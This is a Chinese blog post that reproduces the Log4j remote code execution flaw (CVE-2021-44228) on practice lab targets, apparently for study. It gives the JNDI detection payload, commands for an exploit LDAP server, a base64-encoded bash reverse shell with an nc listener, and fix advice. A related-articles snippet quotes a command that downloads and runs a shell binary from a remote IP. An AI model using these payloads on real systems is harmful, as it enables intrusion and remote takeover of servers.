[漏洞复现]log4j漏洞RCE(CVE-2021-44228)

最新推荐文章于 2024-03-18 20:18:19 发布
最新推荐文章于 2024-03-18 20:18:19 发布
阅读量7.4k 收藏 9
点赞数 1
分类专栏: 漏洞复现 文章标签: log4j 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43895765/article/details/121943404
版权

文章源自于个人博客:http://vfree.ltd/

前言

2021/12/09,阿里云安全团队向apache报告了由log4j日志引起的远程代码执行,12月10日,当天白帽跟提前过大年似的,疯狂刷src(利用超级简单),让部分src平台暂时停止收类似该漏洞,凌晨,很多程序员和安全员被迫起来应急响应,几乎市面上的大厂都受到了该漏洞的影响

这里做一个复现学习的小文章,由于对java这方面的知识雀食是薄弱,而且本地复现时,出现了挺多问题,在本地复现时,不知道是什么原因,利用payload去打的时候,总是说loggxxx模块不存在…idea也犯毛病…果断直接用网上的靶机去复现一波

1.漏洞信息

漏洞信息
漏洞名称Apche log4j远程代码执行漏洞
漏洞编码CVE-2021-44228
漏洞危害严重
漏洞时间2021/12/10
受影响版本Apache Log4j 2.x <= 2.14.1 <= Log4j 2.15.0-rc1
利用难度
POC已知
EXP已知

1.1漏洞描述

apache log4j通过定义每一条日志信息的级别能够更加细致地控制日志生成地过程,受影响地版本中纯在JNDI注入漏洞,导致日志在记录用户输入地数据时,触发了注入漏洞,该漏洞可导致远程代码执行,且利用条件低,影响范围广,小到网站,大到可联网的车都受影响,建议使用了相关版本的应用或者插件,尽快升级修补,做好相关方措施,避免造成不必要的损失

2.受影响组件

根据网上公开的信息来看,目前一下组件是已知搜受影响的插件

  • Spring-boot-strater-log4j2
  • Apache Solr
  • Apache Flink
  • Apache Druid

3.漏洞靶场

  • catflag: 暂无
  • 掌控安全: http://d63bb2586.lab.aqlab.cn/
  • vulfocus: http://vulfocus.fofa.so/#/dashboard
  • ctfshow: https://ctf.show/challenges#Log4j%E5%A4%8D%E7%8E%B0-1730
  • bugku: https://ctf.bugku.com/challenges/detail/id/340.html

4.dnslog platform

  • dnslog: http://www.dnslog.cn/
  • dnslog:https://log.xn–9tr.com/
  • ceye:http://ceye.io/

5.漏洞复现(如果是仅作是否存在该漏洞测试,使用这条payload即可)

测试POC:

payload: ${jndi:idap://[这里填写在上面提到的dns platform 中获取到的dns域名]}

5.1 本地测试

本地测试: Github: https://github.com/fengxuangit/log4j_vuln

5.2靶场复现---vulfocus

这里以vulfocus靶场进行复现,本文目的是为了让学习和研究该漏洞,禁用用于任何非法行为

5.1.1 复现开始

1.构造环境

最好是配置jdk1.8.0_172的版本,更高的版本可以无法利用成功
在反弹shell同时,需要在vps本地构建一个ldap服务

GitHub: https://github.com/welk1n/JNDI-Injection-Exploit

使用:
	1.cd JNDI-Injection-Exploit
	2.mvn clean package -DskipTests
	3.java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "open /Applications/Calculator.app" -A "127.0.0.1"

if '提示' == 'bash: mvn: command not found':
	参考文章: https://blog.csdn.net/jiangyu1013/article/details/103584140

使用mvn构建完成后,会在该文件夹下新建一个target的文件夹,记录该文件夹

2.打开靶机

访问地址根据给出的为准

3.访问题目

注意:题目url要加/hello,并且要以post的方式定义payload值进行传参)

即:url/hello POSTDATA:payload=xxxxxxxx

4. POC测试

在本文上面的第四点讲到的dnslog platform中任意找一个可用的dnslog平台获取一个dns,然后构造payload测试是否存在漏洞

payload传入成功会回显ok


> Got SubDomain :获取dns > Rcfrcsh Rcord :获取目标是否有解析会回来,如果有的话,说明该站可能纯在log4j的漏洞

传入payload (${jndi:idap://[这里填写在上面提到的dns platform 中获取到的dns域名]})

回到dnslog platform查看是否有解析记录

如果dnslog platform返回了类似上面的内容的花,即证明该漏洞存在切可用

5.构造环境

使用到第一步搭建好的 JNDI-Injection-Exploit

在JNDI-Injection-Exploit目录下执行

java -jar target/JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,[经过base64编码后的命令]}|{base64,-d}|bash" -A [你的vpsip]

比如这样子↓

bash -i >& /dev/tcp/127.0.0.1/6666 0>&1 ---> YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjcuMC4wLjEvNjY2NiAwPiYx


 java -jar target/JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjcuMC4wLjEvNjY2NiAwPiYx}|{base64,-d}|bash" -A 127.0.0.1
 注意:根据自身情况调整payload
6.打开监听

另起终端,打开nc -lvp 端口 进行监听

7.Attack

vulfocus的靶机,用类似下面这个payload


8.成功getshell

6.修复建议

  • 1.更新log4j至 rc2(https://github.com/apache/logging-log4j2/releases/tag/log4j-2.15.0-rc2)
  • 2.配置防火墙策略,禁止主动连接外网设备
  • 3.升级受影响的应用及组件
  • 4.过滤相关的关键词,比如${jndi://*}

注意,2021/12/10 360漏洞云发布二次通告预警,官方发布的修复rc1版本仍然可以绕过,请使用该版本的的用户尽快升级至rc2

7.注意的点

所有漏洞复现文章仅供学习交流使用,禁止用于非法用途!!!

v.FREE
关注
  • 1
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
CVE-2021-2109:通过JNDI的CVE-2021-2109 && Weblogic Server RCE
05-26
描述 Oracle Fusion Middleware(组件:控制台)的Oracle WebLogic Server产品中的漏洞。 受影响的受支持版本为10.3.6.0.0、12.1.3.0.0、12.2.1.3.0、12.2.1.4.0和14.1.1.0.0。 容易利用的漏洞使高特权攻击者可以通过HTTP访问网络,从而破坏Oracle WebLogic Server。 成功攻击此漏洞可能导致Oracle WebLogic Server的接管。 CVSS 3.1基本分数7.2(对机密性,完整性和可用性的影响)。 CVSS向量:(CVSS:3.1 / AV:N / AC:L / PR:H / UI:N / S:U / C:H / I:H / A:H) 使适应 需要登录验证 如何RCE 步骤1:设定Weblogic 步骤2:登入 步骤3:设定JNDI伺服器 java -cp marshals
CVE-2021-22192:CVE-2021-22192靶场:未授权用户RCE漏洞
03-30
CVE-2021-22192 CVE-2021-22192靶场:未授权用户RCE漏洞 0x10靶场环境 0x20目录结构 CVE-2021-22192 ├── README.md ............... [此 README 说明] ├── imgs .................... [辅助 README 说明的图片] ├── gitlab .................. [Gitlab 容器的挂载目录] │ ├── Dockerfile .......... [Gitlab 的 Docker 构建文件] │ ├── config .............. [Gitlab 配置挂载目录] │ ├── data ................ [Gitlab 数据挂载目录] │ ├── logs ................ [Gitlab 日
log4j漏洞复现
最新发布
xxx_678的博客
03-18 912
加粗字体解码后:wget http://123.56.136.50/ccccc/shell.elf -O /tmp/shell.elf && chmod +x /tmp/shell.elf && /tmp/shell.elf。https://github.com/WhiteHSBG/JNDIExploit/releases/download/v1.4/JNDIExploit.v1.4.zip //github下载地址。视频地址:https://www.youtube.com/watch?
laravel-CVE-2021-3129-EXP-main.zip 写shellexp
12-17
CVE-2021-3129-EXP 自动写shell的exp
[Java安全]—log4j2 rce复现
Sentiment的博客
07-09 918
漏洞爆出已经半年多了,可当时还是个java啥都不懂的菜鸡所以也没能及时复现,现在捡起来复现下21年席卷整个安全圈的log4j2漏洞log4j 是 javaweb 的日志组件,用来记录 web日志 去指定下载文件的url 在搜索框或者搜索的 url 里面加上${jndi:ldap://127.0.0.1/test} ,log4j 会对这串代码进行表达式解析,给 lookup 传递一个恶意的参数指定,参数指的是比如 ldap 不存在的资源 $ 是会被直接执行的。后面再去指定下载文件的 url,去下载我们的恶意
log4j RCE漏洞原理分析及检测
诺浅的专栏
01-03 624
log4j rce漏洞
log4j漏洞原理和靶场复现
Aiwin的博客
08-19 7254
log4j漏洞原理和靶场复现
log4j2远程代码执行漏洞原理与漏洞复现(基于vulhub,保姆级的详细教程)
Bossfrank的博客
04-14 2万+
本文是log4j2远程代码执行漏洞原理和漏洞复现的详细说明。基于vulhub搭建靶场,攻击者利用log4j2框架下的lookup服务提供的{}字段解析功能,在{}内使用了了JNDI注入的方式,通过RMI或LDAP服务远程加载了攻击者提前部署好的恶意代码(.class),最终造成了远程代码执行。
log4j历史漏洞复现
weixin_53747497的博客
04-02 1162
Apache log4j是Apache的一个开源项目,Apache log4j 2是一个就Java的日志记录工具。该工具重写了 log4j框架,并且引入了大量丰富的特性。我们可以控制日志信息输送的目的地为控制台、文件、GUI组 建等,通过定义每一条日志信息的级别,能够更加细致地控制日志的生成过程。log4j2中存在JNDI注入漏洞,当程序记录用户输入的数据时,即可触发该漏洞。成功利用该漏洞可在目 标服务器上执行任意代码。
Log4J RCE漏洞
RuiIDS的博客
01-06 683
首先log4j打印日志有四个级别:debug、info、warn、error;不管哪个方法打印日志,正常的log处理过程中,对${这两个紧邻的字符做检测,一旦遇到类似报答是结构的字符串就会触发替换机制。一旦log字符串中检测到${},就会解析其中的字符串尝试使用 JDNI的lookup()方法查询,因此,只要能可攻至log阐述内容,就有机会实现漏洞利用。或者说服务器会记录用户输入的信息;这样log4j RCE都会被触发;
VMware_vCenter_UNAuthorized_RCE_CVE-2021-21972:VMware vCenter未授权RCECVE-2021-21972)
03-04
VMware_vCenter_UNAuthorized_RCE_CVE-2021-21972 zoomeye dork:app:“ VMware vCenter” 使用pocsuite3编写的无害检测 ,使用近一年的数据进行探测: 成功率大约:1551/3998 = 39%
log4j2日志包中发现RCE 0day漏洞--测试记录2021年12月10日
陈海明 -全栈
12-12 1296
一、发生时间:2021年12月10日 在流行的 Java 日志库log4j中发现了一个 0day漏洞(绰号Log4Shell 或 LogJam或 log4j2rce,详见:CVE-2021-44228),该漏洞通过记录某个字符串导致远程代码执行 (RCE)。 鉴于log4j2库非常流行,漏洞会被利用完全控制你的服务器,实现挖矿等无法想象的后果。这个 log4j 漏洞非常严重,该漏洞在 CVSS 评级系统中的得分为 10 分,满分是10分,表明问题的严重性。数...
漏洞预警:Apache Log4j RCE漏洞
热门推荐
weixin_43526443的博客
12-13 7万+
目录 Part1 漏洞描述 Part2 危害等级 Part3 漏洞影响 Part4 漏洞分析及验证 源码分析 Part5 漏洞检测 自我检测 攻击检测 产品检测 Part6 漏洞修复 Part1 漏洞描述 Apache Log4j是Apache的一个开源项目,Apache log4j2是Log4j的升级版本,我们可以控制日志信息输送的目的地为控制台、文件、GUI组件等,通过定义每一条日志信息的级别,能够更加细致地控制日志的生成过程。 近日发现Apache Log4j存在任意代码执行
Web网络安全-----Log4j高危漏洞原理及修复
qq_51690690的博客
07-27 1万+
Log4j 即 log for java(java的日志) ,是Apache的一个开源项目,通过使用Log4j,我们可以控制日志信息输送的目的地是控制台、文件、GUI组件,甚至是套接口服务器、NT的事件记录器、UNIX Syslog守护进程等;我们也可以控制每一条日志的输出格式;通过定义每一条日志信息的级别,我们能够更加细致地控制日志的生成过程。最令人感兴趣的就是,这些可以通过一个配置文件来灵活地进行配置,而不需要修改应用的代码。提示:以下是本篇文章正文内容,下面案例可供参考。
网络安全 log4j漏洞复现
jazzz98的博客
06-19 3595
log4j被爆出“史诗级”漏洞。其危害非常大,影响非常广。该漏洞非常容易利用,可以执行任意代码。这个漏洞的影响可谓是重量级的。
log4j RCE 漏洞
b10d9的博客
12-19 4030
漏洞概述 记录本次log4j可以远程命令执行的漏洞CVE-2021-44228(log4shell):受影响版本:2.0-beta9(2013年9月发布)-2.14.1(2021年3月发布) CVE-2021-45046:受影响版本: 2.0-beta9 to 2.15.0, excluding 2.12.2 log4j是一款基于java的日志工具,是Apache logging server的一部分,是使用非常广泛的一种java日志框架,所以受影响范围极广。 漏洞原理 本次漏
Log4j漏洞复现
m1287578441的博客
06-08 2899
Log4j漏洞复现
log4j2-logstash-layout 版本
07-27
log4j2-logstash-layout的版本取决于您的项目需求和依赖项管理工具(如Maven或Gradle)中的配置。以下是一些常见的log4j2-logstash-layout版本: - 1.11.0 - 1.10.0 - 1.9.0 - 1.8.0 - 1.7.0 - 1.6.0 - 1.5.0 - 1.4.0 请注意,这只是一些常见版本号的示例,您可以根据您的项目需要选择合适的版本。 如果您使用Maven作为构建工具,可以在您的pom.xml文件中添加以下依赖项来引入log4j2-logstash-layout: ```xml <dependency> <groupId>net.logstash.log4j</groupId> <artifactId>log4j2-logstash-layout</artifactId> <version>VERSION</version> </dependency> ``` 在上面的示例中,将"VERSION"替换为您想要使用的log4j2-logstash-layout版本号。 如果您使用Gradle作为构建工具,可以在您的build.gradle文件中添加以下依赖项来引入log4j2-logstash-layout: ```groovy implementation 'net.logstash.log4j:log4j2-logstash-layout:VERSION' ``` 同样地,将"VERSION"替换为您想要使用的log4j2-logstash-layout版本号。 请确保根据您的项目需求和依赖项管理工具,选择合适的log4j2-logstash-layout版本。 希望这可以帮助到您!如果您有任何其他问题,请随时提问。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值